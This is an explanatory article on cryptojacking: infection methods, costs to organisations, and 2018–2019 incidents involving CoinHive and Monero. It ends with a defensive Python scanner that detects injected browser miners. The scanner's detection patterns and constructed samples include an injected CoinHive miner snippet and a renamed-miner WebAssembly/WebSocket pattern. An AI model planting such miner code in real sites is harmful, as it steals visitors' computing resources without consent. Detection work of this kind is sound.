Cybercriminals compromise devices to install cryptojacking software. The software works in the background, mining cryptocurrencies or stealing cryptocurrency wallets. Victims typically keep using their devices unaware, although they may notice slower performance or lag.
Hackers have two main ways to get a victim’s device to secretly mine cryptocurrencies:
- By forcing the victim to click on a malicious link in an email that loads the cryptomining code on the computer
Hackers often use both methods to maximize their return. In either case, the code places the cryptojacking script on the device, which runs in the background while the victim is working. Regardless of the method used, the script solves complex mathematical problems on the victim’s device and sends the results to a server controlled by the hacker.
Unlike other types of malware, cryptojacking scripts do not harm victims’ computers or data. However, they steal computer processing resources. For individual users, slower computing performance can just be an annoyance. But cryptojacking is a problem for businesses because organizations with many cryptojacked systems incur real costs. For example:
- Support and IT staff time spent tracking down performance issues and replacing components or systems in the hope of fixing the problem.
- Increased electricity costs.
Some cryptomining scripts have worming capabilities that allow them to infect other devices and servers on a network. This makes them more difficult to identify and remove. These scripts can also check if the device is already infected with competing cryptomining malware. If another cryptominer is detected, the script disables it.
In early cases of cryptomining, some web publishers sought to monetize their traffic by asking visitors for permission to mine cryptocurrencies on their site. They positioned it as a fair exchange: visitors would receive free content while sites would use their computers for mining.
Malicious versions of cryptomining – that is, cryptojacking – do not ask for permission and keep running long after the visitor has left the original site. This is a technique used by owners of questionable sites or by hackers who have compromised legitimate sites. Users have no idea that a site they visited is using their computer to mine cryptocurrency.
The code uses just enough system resources to go unnoticed. Although the user believes all visible browser windows are closed, a hidden window remains open. Often this is a pop-under, sized to fit under the taskbar or behind the clock.
Cryptojacking can even infect Android mobile devices, using the same methods that target desktop computers. Some attacks occur via a Trojan horse hidden in a downloaded application. Or users’ phones may be redirected to an infected site, leaving a persistent pop-under. While individual phones have relatively limited processing power, attacks at scale provide enough collective computing power to justify the cryptojackers’ efforts.
Cryptojacking Attack Examples
In 2019, eight separate apps that were secretly mining cryptocurrency with the resources of whoever downloaded them were kicked from the Microsoft Store. The apps are said to have come from three different developers, although it is suspected that the same individual or organization was behind them all.
In 2018, cryptojacking code was discovered hidden on the Los Angeles Times Homicide Report page. When visitors went to the Homicide Report page, their devices were used to mine a popular cryptocurrency called Monero.
The threat was not detected for a while because the computing power used by the script was minimal, so many users would not be able to detect that their devices had been compromised.
In 2018, cryptojackers targeted the operational technology network of a European water utility control system, severely affecting the ability of operators to manage the utility plant.
This was the first known case of a cryptojacking attack against an industrial control system. Similar to the Los Angeles Times hack, the miner generated Monero.
In early 2018, it emerged that the CoinHive miner was being served in YouTube ads through Google’s DoubleClick platform.
In July and August 2018, a cryptojacking attack infected more than 200,000 MikroTik routers in Brazil, injecting CoinHive code into a huge amount of web traffic.
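As an added example (not code from the original article), the Python scanner below flags the kind of injected in-browser miner described above, as in the YouTube ad and MikroTik traffic-injection cases: it checks captured HTTP response bodies for CoinHive library includes and miner constructor calls, and applies a WebAssembly-plus-WebSocket heuristic for renamed or unbranded miners. All URLs, response bodies and the site key are constructed placeholders.

```python
import re
from typing import Dict, List

# Signatures taken from the CoinHive cases on this page plus generic mining
# protocol/algorithm strings. Matching is case-insensitive.
MINER_SIGNATURES = {
    "CoinHive library include": r"coin-?hive\.com/lib/",
    "CoinHive miner constructor": r"CoinHive\.(Anonymous|User)\s*\(",
    "CryptoNight (Monero) algorithm name": r"cryptonight",
    "stratum mining protocol URL": r"stratum\+tcp://",
}
# Heuristic for renamed miners: hashing in WebAssembly combined with a
# WebSocket back to a proxy is the usual shape of an in-browser miner.
WASM_RE = re.compile(r"WebAssembly\.(instantiate|compile|Module)\b")
WS_RE = re.compile(r"new\s+WebSocket\s*\(\s*['\"]wss?://", re.IGNORECASE)

def scan_response(body: str) -> List[str]:
    """Return the reasons a captured HTTP response body looks miner-injected."""
    reasons = [name for name, pat in MINER_SIGNATURES.items()
               if re.search(pat, body, re.IGNORECASE)]
    if WASM_RE.search(body) and WS_RE.search(body):
        reasons.append("WebAssembly + WebSocket combination (miner-like)")
    return reasons

def scan_capture(responses: Dict[str, str]) -> Dict[str, List[str]]:
    """Scan a url -> body mapping (e.g. a proxy capture) and keep hits only."""
    return {url: r for url, body in responses.items() if (r := scan_response(body))}

# Constructed sample responses; hosts and the site key are placeholders.
SAMPLE_RESPONSES = {
    "http://news.example/story": "<html><body><p>Plain article text.</p></body></html>",
    "http://chat.example/": "<script>var s = new WebSocket('wss://chat.example/ws');</script>",
    "http://injected.example/": (
        "<html><body>legit content</body>"
        "<script src='https://coinhive.com/lib/coinhive.min.js'></script>"
        "<script>var m = new CoinHive.Anonymous('SITE_KEY_PLACEHOLDER'); m.start();</script></html>"
    ),
    "http://renamed.example/": (
        "<script>WebAssembly.instantiate(buf).then(function(){"
        "var ws = new WebSocket('wss://proxy.example/'); ws.send(job);});</script>"
    ),
}

if __name__ == "__main__":
    for url, reasons in scan_capture(SAMPLE_RESPONSES).items():
        print(url, "->", "; ".join(reasons))
```

The legitimate chat page opens a WebSocket but compiles no WebAssembly, so it is not flagged; the renamed miner is caught by the heuristic alone.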